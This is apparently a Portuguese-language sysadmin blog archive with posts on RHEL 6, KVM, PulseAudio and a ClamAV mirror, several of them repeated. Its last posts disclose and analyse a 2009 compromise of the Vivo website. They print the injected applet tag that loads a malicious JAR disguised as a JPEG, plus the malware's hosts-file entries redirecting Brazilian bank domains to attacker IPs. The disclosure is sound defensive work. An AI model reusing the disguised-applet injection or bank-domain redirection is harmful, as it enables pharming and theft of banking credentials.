Olá a todos, alguém por aí ainda? :-D
Estamos voltando, novidades em breve!
quarta-feira, 13 de julho de 2011
segunda-feira, 8 de novembro de 2010
MSSCVMMSSP2
Pense rápido, traduza para português o nome disso:
Microsoft System Center Virtual Machine Manager Self-Service Portal 2.0Sim, o MSSCVMMSSP2 exite. Mesmo.
sexta-feira, 4 de junho de 2010
O fim de uma era
Comecei lá com meus 19 anos, dando suporte a usuários, puxando cabo, compartilhando internet e formatando PC da secretária que pegava vírus. Em resumo, esse foi meu primeiro emprego, que se iniciou em janeiro do ano 2000.
Por incrível que pareça, 10 anos depois não parece tão diferente. A parte do suporte a usuários está bem longe das minhas responsabilidades, mas de vez em quando espirra alguma coisa. Antigamente chegava desktop novo pra cuidar, hoje chega um servidor. É igual, mas diferente. 10 anos atrás tinha que ficar cassando driver p/ instalar as coisas. Hoje em dia não mudou muito. Caiu na minha mão um servidor com uma controladora RAID que não tem driver nativo no Linux. Tem que usar o driver da LSI e só funciona em um kernel específico. Passei horas e horas até acertar tudo e colocar a placa p/ funcionar. Moral: quando eu tinha 19 anos e dava suporte help desk, eu fazia a mesma coisa praticamente.
Na época do help desk eu me preocupava em usar as últimas versões dos programinhas. Hoje também. Apesar que hoje faço atualizações visando segurança e estabilidade, não somente para estar na crista da onda. Mas também não é muito diferente, não é mesmo?
Hoje eu me considero um SysAdmin pleno, com um pé no sênior. Porém, tracei um paralelo bem frio entre meu primeiro emprego de help desk e o de hoje. Não é tão diferente. Hoje posso não ser eu quem passo os cabos, mas eu teria que estar lá de olho em quem está passando. Entende? A sistemática não mudou muito.
E nos próximos 10 anos, quando afinal estarei com 39 anos? Não ponho fé que a sistemática será diferente. Softwares em geral continuaram sendo atualizados. Hardware novo continuará a ser comprado e sistemas operacionais continuarão a ser instalados. Isso significa que a máquina que eu instalei hoje, daqui uns anos, estarei fazendo a mesma coisa. E assim vai. Você aprende alguns truques no meio do caminho, mas é isso.
Já deu, hora de mudar antes que seja tarde demais.
Por incrível que pareça, 10 anos depois não parece tão diferente. A parte do suporte a usuários está bem longe das minhas responsabilidades, mas de vez em quando espirra alguma coisa. Antigamente chegava desktop novo pra cuidar, hoje chega um servidor. É igual, mas diferente. 10 anos atrás tinha que ficar cassando driver p/ instalar as coisas. Hoje em dia não mudou muito. Caiu na minha mão um servidor com uma controladora RAID que não tem driver nativo no Linux. Tem que usar o driver da LSI e só funciona em um kernel específico. Passei horas e horas até acertar tudo e colocar a placa p/ funcionar. Moral: quando eu tinha 19 anos e dava suporte help desk, eu fazia a mesma coisa praticamente.
Na época do help desk eu me preocupava em usar as últimas versões dos programinhas. Hoje também. Apesar que hoje faço atualizações visando segurança e estabilidade, não somente para estar na crista da onda. Mas também não é muito diferente, não é mesmo?
Hoje eu me considero um SysAdmin pleno, com um pé no sênior. Porém, tracei um paralelo bem frio entre meu primeiro emprego de help desk e o de hoje. Não é tão diferente. Hoje posso não ser eu quem passo os cabos, mas eu teria que estar lá de olho em quem está passando. Entende? A sistemática não mudou muito.
E nos próximos 10 anos, quando afinal estarei com 39 anos? Não ponho fé que a sistemática será diferente. Softwares em geral continuaram sendo atualizados. Hardware novo continuará a ser comprado e sistemas operacionais continuarão a ser instalados. Isso significa que a máquina que eu instalei hoje, daqui uns anos, estarei fazendo a mesma coisa. E assim vai. Você aprende alguns truques no meio do caminho, mas é isso.
Já deu, hora de mudar antes que seja tarde demais.
sexta-feira, 30 de abril de 2010
:-D
Dear Miguel,
Congratulations! Your proposal " Converting Monitor interface functions to QMP" as submitted to "QEMU development team" has been accepted for Google Summer of Code 2010
http://wiki.qemu.org/Google_Summer_of_Code_2010/QMP
http://lists.gnu.org/archive/html/qemu-devel/2010-04/msg01805.html
http://socghop.appspot.com/gsoc/student_project/show/google/gsoc2010/qemu/t127230768374
Haja coração!
sexta-feira, 23 de abril de 2010
Xen vs KVM
De um lado, um funcionário da Citrix/XenSource. De outro, um funcionário de uma empresa parceira da Red Hat e embaixador do Fedora.
Esse camarada escreveu defendendo o Xen tecnicamente e não só isso, desceu a lenha na estratégia da Red Hat de usar o KVM e abandonar o Xen no RHEL 6:
http://community.citrix.com/display/ocb/2010/04/23/Xen+and+a+Theory+of+RHEL-evance
Já esse aqui defendeu o KVM e marretou muita coisa que o camarada da Citrix falou:
http://linuxriola.wordpress.com/2010/04/23/red-hat-and-kvm-are-still-rhel-evant/
Boa leitura.
Esse camarada escreveu defendendo o Xen tecnicamente e não só isso, desceu a lenha na estratégia da Red Hat de usar o KVM e abandonar o Xen no RHEL 6:
http://community.citrix.com/display/ocb/2010/04/23/Xen+and+a+Theory+of+RHEL-evance
Já esse aqui defendeu o KVM e marretou muita coisa que o camarada da Citrix falou:
http://linuxriola.wordpress.com/2010/04/23/red-hat-and-kvm-are-still-rhel-evant/
Boa leitura.
quinta-feira, 22 de abril de 2010
RHEL 6 beta - primeiras impressões
A Red Hat liberou um beta do RHEL 6. Tudo continua com o jeitão Red Hat de ser, sem surpresas. O RHEL 6 é a grosso modo um fork do Fedora 12. Levantei alguns pontos, pois são relacionados ao que já uso atualmente no CentOS 5:
- Sem suporte a Xen como Dom0 (eu já sabia Galvão)
- Kernel 2.6.32
- O amanda foi substituído pelo bacula como solução para backup.
- Não tem mais nss_ldap, agora o daemon sssd assume esse papel.
- Vários módulos e pacotes Python from adicionados: twisted, paramiko, markdown e outros.
- PHP é o 5.3, única novidade são as extensões APC e memcache.
- ext4 é o sistema de arquivos padrão.
- Ainda vem sendmail :-|, mas tem o Postfix 2.6. Sem Amavis. SpamAssassin 3.3. Dovecot 1.2.9.
- Bind 9.7
- grub 0.97
- OpenSSL 1.0
- Kerberos MIT 1.7
segunda-feira, 8 de fevereiro de 2010
Vai pro inferno NET!
A NET entrou em uma campanha pesada para vender pacotes com canais HD para os assinantes.
Como eu sei? Por que eles me ligaram semana passada e eu disse que não queria. Me ligaram hoje de manhã novamente e disse que não queria. Educadamente pedi para não ligarem mais. Ligaram de novo agora na parte da tarde! Duas vezes no mesmo dia! Puta merda, que insistência em meu?! Falei para a terceira atendente da situação e ela me disse que "são centrais diferentes, por isso não temos como saber se já ligaram para o sr. ou não". Hã?
Como eu sei? Por que eles me ligaram semana passada e eu disse que não queria. Me ligaram hoje de manhã novamente e disse que não queria. Educadamente pedi para não ligarem mais. Ligaram de novo agora na parte da tarde! Duas vezes no mesmo dia! Puta merda, que insistência em meu?! Falei para a terceira atendente da situação e ela me disse que "são centrais diferentes, por isso não temos como saber se já ligaram para o sr. ou não". Hã?
segunda-feira, 1 de fevereiro de 2010
PulseAudio = FAIL
As APIs de som no mundo do software livre são uma selva. São o caos.
Instalei o Ubuntu 9.04, deixei o som do jeito que veio, usando o padrão da distro. Nada de Skype e nem sequer o Gnome Sound Recorder funcionar. Detalhe que minha máquina não é nova, já tem seus mais de 3 anos e o som funcionava redondo no Debian.
Solução: removi todos os pacotes que tinham "pulse" no nome, acertei os volumes no alsamixer. Todas as entras e saídas de som voltaram a funcionar perfeitamente.
Instalei o Ubuntu 9.10. Exatamente a mesma coisa: PulseAudio ativado, microfone nao funciona. PulseAudio removido, microfone perfeito.
Um amigo passou em casa ontem com o seu laptop Acer de pelo menos 1 ano de idade. Ele não é da área mas se vira muito bem. Ele instalou o Ubuntu 9.10 pelo wubi e estava gostando muito da experiência, exceto uma coisa: som do laptop todo bagunçado. Plugando fone de ouvido o som continuava saindo nas caixas, microfone embutido não funcionava, só microfonia e a entrada frontal de microfone também não funcionava. Fuçamos em tudo o que é tela de configuração e nada.
Solução: removemos o pulseaudio, abrimos o alsamixer, acertamos os volumes e tiramos do mudo os canais do microfone. Resultado: tudo funcionando perfeitamente. Fone de ouvido, microfone embutido e frontal.
Colega do trampo vem usando Fedora 10, 11 e 12. Primeira coisa que ele faz: remove o PulseAudio, pois o microfone e o fone de ouvido não funcionam.
PulseAudio serve pra que mesmo?
Instalei o Ubuntu 9.04, deixei o som do jeito que veio, usando o padrão da distro. Nada de Skype e nem sequer o Gnome Sound Recorder funcionar. Detalhe que minha máquina não é nova, já tem seus mais de 3 anos e o som funcionava redondo no Debian.
Solução: removi todos os pacotes que tinham "pulse" no nome, acertei os volumes no alsamixer. Todas as entras e saídas de som voltaram a funcionar perfeitamente.
Instalei o Ubuntu 9.10. Exatamente a mesma coisa: PulseAudio ativado, microfone nao funciona. PulseAudio removido, microfone perfeito.
Um amigo passou em casa ontem com o seu laptop Acer de pelo menos 1 ano de idade. Ele não é da área mas se vira muito bem. Ele instalou o Ubuntu 9.10 pelo wubi e estava gostando muito da experiência, exceto uma coisa: som do laptop todo bagunçado. Plugando fone de ouvido o som continuava saindo nas caixas, microfone embutido não funcionava, só microfonia e a entrada frontal de microfone também não funcionava. Fuçamos em tudo o que é tela de configuração e nada.
Solução: removemos o pulseaudio, abrimos o alsamixer, acertamos os volumes e tiramos do mudo os canais do microfone. Resultado: tudo funcionando perfeitamente. Fone de ouvido, microfone embutido e frontal.
Colega do trampo vem usando Fedora 10, 11 e 12. Primeira coisa que ele faz: remove o PulseAudio, pois o microfone e o fone de ouvido não funcionam.
PulseAudio serve pra que mesmo?
PulseAudio is a sound system for POSIX OSes, meaning that it is a proxy for your sound applications. It allows you to do advanced operations on your sound data as it passes between your application and your hardware. Things like transferring the audio to a different machine, changing the sample format or channel count and mixing several sounds into one are easily achieved using a sound server.E daí? A porra do meu microfone não funciona com essa merda instalada! Não tenho mais saúde e idade pra ficar brigando com distribuições por coisas desses tipo.
quarta-feira, 27 de janeiro de 2010
sexta-feira, 22 de janeiro de 2010
KVM block migration
Para fazer live migration de uma VM de um host para outro, era necessário que o arquivo/dispositivo da VM estivesse em algum ambiente compartilhado entre os hosts: iSCSI, NFS ou GFS, por exemplo. Você prestou atenção? Eu disse era.
Entre um novo recurso do KVM:
http://www.linux-kvm.com/content/qemu-kvm-012-adds-block-migration-feature
Basicamente ele vai copiar o arquivo da máquina virtual também, não só a memória. KVM, aí vou eu!
Entre um novo recurso do KVM:
http://www.linux-kvm.com/content/qemu-kvm-012-adds-block-migration-feature
Basicamente ele vai copiar o arquivo da máquina virtual também, não só a memória. KVM, aí vou eu!
segunda-feira, 11 de janeiro de 2010
kernel-xen não fica como padrão no CentOS
Nada como de vez em quando, dar uma olhadinha em listas de discussão. Sempre aparece alguma dica boa, sempre. Nas máquinas que tenho o Xen funcionando, sempre deixo o kernel sem suporte a Xen instalado também, só por precaução.
Toda vez que os pacotes kernel e kernel-xen eram atualizados, o kernel padrão no menu.lst sempre voltava para a versão não-Xen. Como a máquina reboota muito pouco, nunca me preocupei em resolver essa estranheza.
Lendo a lista de discussão do CentOS apareceu alguém com o mesmo problema, e alguém com a resposta. O segredo está no arquivo /etc/sysconfig/kernel :-D
Toda vez que os pacotes kernel e kernel-xen eram atualizados, o kernel padrão no menu.lst sempre voltava para a versão não-Xen. Como a máquina reboota muito pouco, nunca me preocupei em resolver essa estranheza.
Lendo a lista de discussão do CentOS apareceu alguém com o mesmo problema, e alguém com a resposta. O segredo está no arquivo /etc/sysconfig/kernel :-D
terça-feira, 27 de outubro de 2009
Mirror do ClamAV no ar!
Já está no ar o mirror 4o. mirror brasileiro do ClamAV e ele está aqui no Instituto de Computação, mais exatamente dentro do Laboratório de Administração e Segurança de Sistemas :-D
Tudo começou com o Allan Carvalho, sysadmin colega aqui da Unicamp que trabalha no Centro de Engenharia Biomédica simplesmente perguntando para nós se não seria possível fazer um mirror do ClamAV no IC. Encaminhei o pedido ao Prof. Paulo Lício responsável pelo LAS. Me ofereci para fazer e monitorar o mirror. O Prof. entrou com máquina e link, eu com a mão de obra. Tchanã!
Ééééééééé do Brasiiiiiiiiiil!!!
Tudo começou com o Allan Carvalho, sysadmin colega aqui da Unicamp que trabalha no Centro de Engenharia Biomédica simplesmente perguntando para nós se não seria possível fazer um mirror do ClamAV no IC. Encaminhei o pedido ao Prof. Paulo Lício responsável pelo LAS. Me ofereci para fazer e monitorar o mirror. O Prof. entrou com máquina e link, eu com a mão de obra. Tchanã!
$ dig db.br.clamav.net +short
143.106.60.118 <- IP do mirror no IC
200.17.202.1
200.96.36.20
200.139.115.7
Ééééééééé do Brasiiiiiiiiiil!!!
segunda-feira, 28 de setembro de 2009
Palestras na Unicamp em outubro
Dia 15 de outubro apresentarei a palestra Ataques contra o SMTP - Como as botnets enviam spam. Essa palestra é praticamente a mesma que apresentei no GTS em junho e no FISL em julho, porém, vou mostrar algumas coisas a mais e fazer algum demo. A palestra é gratuita e será dada no Centro de Computação da Unicamp. Apareça por lá! Não esqueça de se inscrever. Obrigado ao Rubens Queiroz pelo convite!
Falta só confirmar a data, mas provalvelmente será nos dia 21 ou 28 de outubro. Novamente a Profa. Islene abriu espaço para uma idéia que dei sobre mostrar aos alunos como criar pacotes RPM e DEB. Virou palestra na disciplina MC039/MO901: Seminários sobre Software Livre do curso de Ciência da Computação do IC: Como dominar o mundo - Empacotando seu projeto nos formatos RPM e DEB. A aula é aberta e qualquer um pode aparecer, não precisa estar matriculado.
Falta só confirmar a data, mas provalvelmente será nos dia 21 ou 28 de outubro. Novamente a Profa. Islene abriu espaço para uma idéia que dei sobre mostrar aos alunos como criar pacotes RPM e DEB. Virou palestra na disciplina MC039/MO901: Seminários sobre Software Livre do curso de Ciência da Computação do IC: Como dominar o mundo - Empacotando seu projeto nos formatos RPM e DEB. A aula é aberta e qualquer um pode aparecer, não precisa estar matriculado.
sexta-feira, 11 de setembro de 2009
Ainda sobre a Vivo
Bom, agora que a poeira já baixou eu vou liberar os "artefatos" do ocorrido, já que muita gente tem me pedido.
http://www.ic.unicamp.br/~miguel/security/artefatos-vivo-20090908.zip
Eu quero frisar que só percebi que o site estava comprometido, por que fui completamente desatento quando a mensagem de aviso do Java apareceu e mandei executar o applet. Depois disso é que percebi o que aconteceu.
Quando vi a dimensão do problema ficou evidente que eu teria que colocar a boca no trombone, pois certamente pessoas inocentes seriam lesadas. Felizmente deu certo e gerou muito barulho!
http://info.abril.com.br/noticias/seguranca/site-da-vivo-sofre-ataque-e-infecta-maquinas-09092009-37.shl
http://info.abril.com.br/noticias/seguranca/vivo-confirma-ataque-a-sua-pagina-10092009-4.shl
http://idgnow.uol.com.br/telecom/2009/09/09/vivo-diz-que-solucionou-problema-em-seu-site/
http://www.linuxnewmedia.com.br/blogs/seguranca/analise_vivo/
http://www.legaltech.com.br/blog/?p=128
http://blog.mhavila.com.br/2009/09/09/portal-da-vivo-comprometido-prolifera-fraude/
http://www1.folha.uol.com.br/folha/informatica/ult124u621523.shtml
http://g1.globo.com/Noticias/Tecnologia/0,,MUL1300037-6174,00-MAIS+DE+MIL+INTERNAUTAS+PODEM+TER+SIDO+INFECTADOS+POR+SITE+DA+VIVO.html
O que achei chato foi que tornaram público onde estava o problema no site da Vivo, explorando o bug de inclusão de arquivo e divulgaram a URL do servidor da USP também. Na noite de terça-feira eu já tinha localizado isso e quando divulguei o problema da Vivo eu já havia enviado e-mails para os contatos de whois da USP e do Instituto de Oceanografia, onde acredito que estava o servidor comprometido.
Agradecimentos ao pessoal do GTS que foram atrás para confirmar a presença do malware no site da Vivo e procuraram fazer a informação chegar até alguém da empresa o quanto antes.
Agora, verdade seja dita sobre a Vivo: vacilou e muito. Bug de inclusão de arquivo em PHP, pela mor em meu? Pelo menos instala o modsecurity aí, pô! É de grátis e não vai pesar nos bilhões de reais de lucro da empresa :-D
http://www.ic.unicamp.br/~miguel/security/artefatos-vivo-20090908.zip
Eu quero frisar que só percebi que o site estava comprometido, por que fui completamente desatento quando a mensagem de aviso do Java apareceu e mandei executar o applet. Depois disso é que percebi o que aconteceu.
Quando vi a dimensão do problema ficou evidente que eu teria que colocar a boca no trombone, pois certamente pessoas inocentes seriam lesadas. Felizmente deu certo e gerou muito barulho!
http://info.abril.com.br/noticias/seguranca/site-da-vivo-sofre-ataque-e-infecta-maquinas-09092009-37.shl
http://info.abril.com.br/noticias/seguranca/vivo-confirma-ataque-a-sua-pagina-10092009-4.shl
http://idgnow.uol.com.br/telecom/2009/09/09/vivo-diz-que-solucionou-problema-em-seu-site/
http://www.linuxnewmedia.com.br/blogs/seguranca/analise_vivo/
http://www.legaltech.com.br/blog/?p=128
http://blog.mhavila.com.br/2009/09/09/portal-da-vivo-comprometido-prolifera-fraude/
http://www1.folha.uol.com.br/folha/informatica/ult124u621523.shtml
http://g1.globo.com/Noticias/Tecnologia/0,,MUL1300037-6174,00-MAIS+DE+MIL+INTERNAUTAS+PODEM+TER+SIDO+INFECTADOS+POR+SITE+DA+VIVO.html
O que achei chato foi que tornaram público onde estava o problema no site da Vivo, explorando o bug de inclusão de arquivo e divulgaram a URL do servidor da USP também. Na noite de terça-feira eu já tinha localizado isso e quando divulguei o problema da Vivo eu já havia enviado e-mails para os contatos de whois da USP e do Instituto de Oceanografia, onde acredito que estava o servidor comprometido.
Agradecimentos ao pessoal do GTS que foram atrás para confirmar a presença do malware no site da Vivo e procuraram fazer a informação chegar até alguém da empresa o quanto antes.
Agora, verdade seja dita sobre a Vivo: vacilou e muito. Bug de inclusão de arquivo em PHP, pela mor em meu? Pelo menos instala o modsecurity aí, pô! É de grátis e não vai pesar nos bilhões de reais de lucro da empresa :-D
terça-feira, 8 de setembro de 2009
Site da Vivo comprometido
Copiando e colando o e-mail que acabo de mandar para o GTS e para os e-mails do whois da Vivo.
Caros,
Entrei no site da Vivo por volta de 20:00 horas para mandar um SMS. Estranhamente logo na página inicial o site pediu para executar um applet. Executei pensando: "O que que esses caras estão pensando!?".
Site não carregava. Mandei do telefone mesmo.
Uns 30 minutos depois fui abrir um arquivo e encontrei em meu homedir um arquivo chamado '\WINDOWS\system32\drivers\etc\hosts' e 'c:\NOSO072009BETA3ba.log' Bam! Foi o site da Vivo, certeza!
Conteúdo do arquivo hosts:
Agora com mais cuidado:
$ wget http://www.vivo.com.br/portal/home.php
Abri o arquivo e encontrei isso:
JAR disfarçado de foto!
$ wget http://www.vivo.com.br/portal/co/logo_top.jpg
$ file logo_top.jpg:
Zip archive data, at least v2.0 to extract
$ unzip logo_top.jpg
Archive: logo_top.jpg
inflating: META-INF/MANIFEST.MF
inflating: META-INF/VIVOO.SF
inflating: META-INF/VIVOO.RSA
inflating: laa.class
inflating: .classpath
inflating: .project
$ egrep hosts laa.class
Binary file laa.class matches
Basta abrir em qualquer editor o laa.class e dá pra ver _tudo_ claro
como a luz do dia: malware.
Fotos:
Caros,
Entrei no site da Vivo por volta de 20:00 horas para mandar um SMS. Estranhamente logo na página inicial o site pediu para executar um applet. Executei pensando: "O que que esses caras estão pensando!?".
Site não carregava. Mandei do telefone mesmo.
Uns 30 minutos depois fui abrir um arquivo e encontrei em meu homedir um arquivo chamado '\WINDOWS\system32\drivers\etc\hosts' e 'c:\NOSO072009BETA3ba.log' Bam! Foi o site da Vivo, certeza!
Conteúdo do arquivo hosts:
69.162.114.180 santander.com.br
69.162.114.180 www.santander.com.br
69.162.114.181 itau.com.br
69.162.114.181 www.itau.com.br
69.162.114.181 www.itau.com
69.162.114.181 itau.com
69.162.114.181 itaupersonnalite.com.br
69.162.114.181 www.itaupersonnalite.com.br
69.162.114.182 www.bradesco.com.br
69.162.114.182 bradesco.com.br
69.162.114.182 www.bradesco.com
69.162.114.182 bradesco.com
69.162.114.182 www.bradescoempresa.com.br
69.162.114.182 bradescoempresa.com.br
69.162.114.182 www.bradescoprime.com.br
69.162.114.182 bradescoprime.com.br
69.162.114.182 bradescocartoes.com.br
69.162.114.182 www.bradescocartoes.com.br
69.162.114.179 www.nossacaixa.com.br
69.162.114.179 nossacaixa.com.br
Agora com mais cuidado:
$ wget http://www.vivo.com.br/portal/home.php
Abri o arquivo e encontrei isso:
<applet name="Vivo Online - IMPORTANTE: (Para executar corretamente o Vivo Online clique em `Run´.)" code="laa.class" archive="http://www.vivo.com.br/portal/co/logo_top.jpg" width="0" height="0"><param name="Vivo Online" value=""></applet>
JAR disfarçado de foto!
$ wget http://www.vivo.com.br/portal/co/logo_top.jpg
$ file logo_top.jpg:
Zip archive data, at least v2.0 to extract
$ unzip logo_top.jpg
Archive: logo_top.jpg
inflating: META-INF/MANIFEST.MF
inflating: META-INF/VIVOO.SF
inflating: META-INF/VIVOO.RSA
inflating: laa.class
inflating: .classpath
inflating: .project
$ egrep hosts laa.class
Binary file laa.class matches
Basta abrir em qualquer editor o laa.class e dá pra ver _tudo_ claro
como a luz do dia: malware.
Fotos:
Assinar:
Postagens (Atom)